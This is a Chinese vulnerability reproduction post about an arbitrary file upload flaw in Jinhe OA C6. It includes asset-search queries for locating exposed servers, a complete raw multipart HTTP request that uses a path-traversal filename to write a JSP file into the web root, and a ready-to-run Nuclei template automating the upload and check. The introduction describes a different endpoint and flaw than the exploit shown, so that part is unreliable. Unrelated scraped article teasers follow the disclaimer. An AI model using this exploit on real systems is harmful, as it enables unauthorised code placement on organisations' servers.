【漏洞复现】金和OA 任意文件上传

【产品介绍】

金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。

【漏洞介绍】

金和OA sap-b1config-aspx接口存在未授权,攻击者可通过此漏洞获取敏感信息。

【资产测绘Query】

Fofa语法:app=”金和网络-金和OA”

Hunter语法:app.name=”金和 OA”

【产品界面】

【漏洞复现】

 
  1. POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
  2. Host: 127.0.0.1
  3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  6. Accept-Encoding: gzip, deflate
  7. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
  8. Connection: close
  9. Content-Length: 444
  10. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  11. Content-Disposition: form-data; name="filename"
  12. ../../../../upload/123.jsp
  13. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  14. Content-Disposition: form-data; name="upLoadFile"; filename="a.jpg"
  15. Content-Type: image/jpeg
  16. <% out.println("Hello, World!"); %>
  17. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  18. Content-Disposition: form-data; name="Submit"
  19. upload
  20. ------WebKitFormBoundary5iALAXlSiqxJXrhK--


成功上传,访问路径upload/123.jsp

【Nuclei-Poc】

 
  1. id: example-file-upload
  2. info:
  3. name: Example File Upload
  4. author: your-name
  5. severity: high
  6. requests:
  7. - raw:
  8. - |
  9. POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
  10. Host: {{Hostname}}
  11. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
  12. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
  13. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  14. Accept-Encoding: gzip, deflate
  15. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
  16. Connection: close
  17. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  18. Content-Disposition: form-data; name="filename"
  19. ../../../../upload/test.jsp
  20. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  21. Content-Disposition: form-data; name="upLoadFile"; filename="test.jpg"
  22. Content-Type: image/jpeg
  23. <% out.println("Hello, World!"); %>
  24. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  25. Content-Disposition: form-data; name="Submit"
  26. upload
  27. ------WebKitFormBoundary5iALAXlSiqxJXrhK--
  28. - |
  29. GET /upload/test.jsp HTTP/1.1
  30. Host: {{Hostname}}
  31. Accept: */*
  32. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
  33. matchers-condition: and
  34. matchers:
  35. - type: word
  36. words:
  37. - "Hello, World!"
  38. part: body
  39. - type: status
  40. status:
  41. - 200

【验证】

.\nuclei -l 1.txt -t 6.yaml

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/36054.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

老生常谈问题之什么是缓存穿透、缓存击穿、缓存雪崩?举个例子你就彻底懂了!!

老生常谈问题之什么是缓存穿透、缓存击穿、缓存雪崩&#xff1f;举个例子你就彻底懂了&#xff01;&#xff01; 缓存穿透发生场景解决方案 缓存击穿解决方案 缓存雪崩发生场景解决方案 总结三者区分三者原因三者解决方案 想象一下&#xff0c;你开了一家便利店&#xff0c;店里…

Unity3D Text使用超链接跳转事件

系列文章目录 Unity工具 文章目录 系列文章目录&#x1f449;前言&#x1f449;一、第一种使用TextMeshPro加入超链接&#x1f449;二、继承Text组件,重载OnPopulateMesh方法&#x1f449;三.壁纸分享&#x1f449;总结 &#x1f449;前言 有时候会用到跳转的问题,所以添加一…

基于深度学习的轮廓匹配

基于深度学习的轮廓匹配 轮廓匹配是一种用于识别和定位图像中物体的技术&#xff0c;通过比较图像中的轮廓与已知模板轮廓的相似度&#xff0c;确定目标物体的位置和形状。基于深度学习的轮廓匹配方法结合了卷积神经网络&#xff08;CNN&#xff09;等深度学习技术&#xff0c…

【Python机器学习实战】 | 基于支持向量机(Support Vector Machine, SVM)进行分类和回归任务分析

&#x1f3a9; 欢迎来到技术探索的奇幻世界&#x1f468;‍&#x1f4bb; &#x1f4dc; 个人主页&#xff1a;一伦明悦-CSDN博客 ✍&#x1f3fb; 作者简介&#xff1a; C软件开发、Python机器学习爱好者 &#x1f5e3;️ 互动与支持&#xff1a;&#x1f4ac;评论 &…

一个AI图片生成工具导航网站

上周末上线了一个AI图片生成工具导航网站&#xff0c;主要是面向AI图片工具这个垂直领域。 https://chatgpt-image-generator.com/ 目标是通过收集当下的一些工具&#xff0c;然后进行分类管理&#xff0c;一方面方便大家发现新的工具&#xff0c;另一方面能够更加有针对性、…

华为OceanStor磁盘阵列存储恢复出厂设置命令 LUN不处于在线状态,不能执行此操作解决方案

环境 OceanStor S2600T V2老版本 客户现场有一台Oceanstor 2600 V2的存储&#xff0c;因和另一台磁盘扩展框做了跨设备LUN需要进行配置清除&#xff0c;配置结束后需要重新划分存储空间并对接服务器&#xff0c;保证业务能够正常上线&#xff01;在清除配置回退的过程中&#…

深度学习二分类评估详细解析与代码实战

深度学习二分类的实战代码&#xff1a;使用 Trainer API 微调模型. https://huggingface.co/learn/nlp-course/zh-CN/chapter3/3 如果你刚接触 自然语言处理&#xff0c;huggingface 是你绕不过去的坎。但是目前它已经被墙了&#xff0c;相信读者的实力&#xff0c;自行解决吧。…

渗透第二次作业

cs与msf权限传递&#xff0c;以及mimikatz抓取win2012明文密码 1、准备三台虚拟机&#xff1a; 一台安装有cs的kali,网络模式为nat&#xff0c; 一台Win2012,有两张网卡&#xff0c;一张为NAT模式&#xff0c;一张为仅主机模式&#xff0c;分别对应内外网&#xff0c; 一台…

QT的TCP服务端与多客户端通信

目的 TCP通信可以说是最基础的东西了,也是面试经常问的问题,记得10年前,面试浪潮时,就是问的TCP连接的过程。 时间长了不用,感觉一些东西模糊了,基础的东西还是需要清晰的,而且,现在是QT的TCP,用法也有一些自己的特点。 这里主要说的就是服务端与多客户端的通信,这也…

G8 - ACGAN

&#x1f368; 本文为&#x1f517;365天深度学习训练营 中的学习记录博客&#x1f356; 原作者&#xff1a;K同学啊 目录 模型结构 模型结构 之前几期打卡中&#xff0c;已经介绍过GAN CGAN SGAN&#xff0c;而ACGAN属于上述几种GAN的缝合怪&#xff0c;其模型的结构图如下&a…

Python 中的抽象语法树

Abstract Syntax Trees in Python 注&#xff1a;机翻&#xff0c;未校对。 Requirement: All examples are compatible with at least Python v3.6, except for using ast.dump() with the attribute indent which has been added in Python v3.9. 要求&#xff1a;所有示例至…

如何检测和处理Android应用程序中的内存泄漏问题。

在Android开发中&#xff0c;内存泄漏是一个不容忽视的问题。它不仅会影响应用程序的性能&#xff0c;还可能导致应用崩溃&#xff0c;给用户带来不良体验。因此&#xff0c;作为开发者&#xff0c;我们必须了解如何检测和处理内存泄漏。下面&#xff0c;我将从技术难点、面试官…

结题阶段(2024年6月)

课题研究大事记 序号 时间 内容安排 负责人 备注 1 2022.4 课题审定会议 全体成员 2 2022.4 开题报告撰写 郭书艳 3 2022.4 课题申报 郭书艳 4 2022.5 课题立项报告会 郭书艳、陈晓忠 5 2022.6 课题推进安排会 俞峰 6 2022.7 当下课堂模式…

第二十课,认识列表与定义列表

一&#xff0c;列表的作用 思考一个问题&#xff1a;如果我想要在程序中&#xff0c;记录5名学生的信息&#xff0c;如姓名。 如何做呢&#xff1f; 这就是列表的作用&#xff0c;能帮助我们更加高效的存储各种数据 思考&#xff1a;如果一个班级100位学生&#xff0c;每个人…

利用SHAP算法解释BERT模型的输出

1 何为SHAP? 传统的 feature importance 只告诉哪个特征重要&#xff0c;但并不清楚该特征如何影响预测结果。SHAP 算法的最大优势是能反应每一个样本中特征的影响力&#xff0c;且可表现出影响的正负性。SHAP算法的主要思想为&#xff1a;控制变量法&#xff0c;如果某个特征…

VMware完美安装Ubuntu20.04

一、官网下载Ubuntu20.04 下载地址为&#xff1a;https://releases.ubuntu.com/https://releases.ubuntu.com/ 下载完后镜像为ubuntu-20.04.4-desktop-amd64.iso 二、Ubuntu安装 2.1、打开VMware player&#xff0c;并创建新虚拟机。 2.2、点击浏览按钮选择需要安装的镜像 2…

Linux系统上部署Whisper。

Whisper是一个开源的自动语音识别&#xff08;ASR&#xff09;模型&#xff0c;最初由OpenAI发布。要在本地Linux系统上部署Whisper&#xff0c;你可以按照以下步骤进行&#xff1a; 1. 创建虚拟环境 为了避免依赖冲突&#xff0c;建议在虚拟环境中进行部署。创建并激活一个新…

问题 N: 二叉树的创建和文本显示

问题 N: 二叉树的创建和文本显示 题目描述 编一个程序&#xff0c;读入先序遍历字符串&#xff0c;根据此字符串建立一棵二叉树&#xff08;以指针方式存储&#xff09;。 例如如下的先序遍历字符串&#xff1a; A ST C # # D 10 # G # # F # # # 各结点数据&#xff08;长度不…

数据结构实训:表达式求值器(非常详细)

表达式求值器 问题描述&#xff1a; 设计一个表达式求值器&#xff0c;能够解析和计算由数字、运算符和括号组成的算术表达式。要求实现基本的四则运算&#xff0c;如加、减、乘、除&#xff0c;并处理运算符的优先级和括号。 设计要点&#xff1a; 1. 使用栈作为数据结构来处…

ElementUI组件

目录 1、安装ElementUI 2、在main.js文件中加入 3、使用组件 终端运行&#xff1a; Element&#xff0c;一套为开发者、设计师和产品经理准备的基于Vue2.0的桌面端组件库. 1、安装ElementUI 控制台输入 npm i element-ui -S 2、在main.js文件中加入 import ElementUI from…